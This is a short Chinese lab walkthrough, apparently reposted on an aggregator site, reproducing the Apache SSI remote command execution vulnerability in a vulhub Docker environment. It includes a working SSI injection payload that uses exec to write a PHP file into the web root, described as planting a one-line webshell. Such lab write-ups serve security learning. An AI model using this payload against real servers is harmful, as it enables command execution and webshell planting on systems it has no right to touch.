当前位置: 首页 > news >正文

vulhub中的Apache SSI 远程命令执行漏洞

news 2025/8/22 8:32:55

Apache SSI 远程命令执行漏洞

1.cd到ssi-rce

cd /opt/vulhub/httpd/ssi-rce/

2.执行docker-compose up -d

docker-compose up -d

3.查看靶场是否开启成功

 dooker ps

拉取成功了

4.访问url

这里已经执行成功了,注意这里需要加入/upload.php

5.写入一句话木马

<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->

6.提交查询

7.点击shell.shtml

8.查看是否写入成功

 docker exec -it ssi-rce_apache_1 /bin/bash

9.获取phpinfo

http://www.lryc.cn/news/276902.html

相关文章:

  • MSB20M-ASEMI迷你贴片整流桥MSB20M
  • 工程管理系统功能设计与实践:实现高效、透明的工程管理
  • 【C#】网址不进行UrlEncode编码会存在一些问题
  • 深入Pandas(二):高级数据处理技巧
  • 实验8 分析HTTP协议和DNS
  • Talk | EMNLP 2023 最佳长论文:以标签为锚-从信息流动的视角分析上下文学习
  • 2024年中国电子学会青少年编程等级考试安排的通知
  • [足式机器人]Part3 机构运动学与动力学分析与建模 Ch00-2(2) 质量刚体的在坐标系下运动
  • 【亚马逊云科技】自家的AI助手 - Amazon Q
  • 网络安全—SSL安全访问应用
  • Qt5.14.2实现将html文件转换为pdf文件
  • Minecraft教程:使用MCSM面板搭建我的世界私服并实现远程联机
  • springboot学生成绩管理系统源码和论文
  • w20webshell之文件上传
  • 【Redis】非关系型数据库之Redis的主从复制、哨兵和集群高可用
  • 从私有Git仓库的搭建到命令的使用及部署再到分支管理
  • mysql基础-常用函数汇总
  • COCO数据格式的json文件内容
  • AI-数学-高中-3.二次函数的根的分布问题的解题方法
  • golang中gorm使用
  • centoss7安装mysql详细教程
  • SpringBoot-拓展
  • 用于查询性能预测的计划结构深度神经网络模型--大数据计算基础大作业
  • MySQL5.7用于控制副本服务器的 SQL 语句
  • stable diffusion 人物高级提示词(四)朝向、画面范围、远近、焦距、机位、拍摄角度
  • C#.Net学习笔记——设计模式六大原则
  • go 修改postgresql的配置参数
  • 解决word图片格式错乱、回车图片不跟着换行的问题
  • 密码学(二)
  • mysql进阶-视图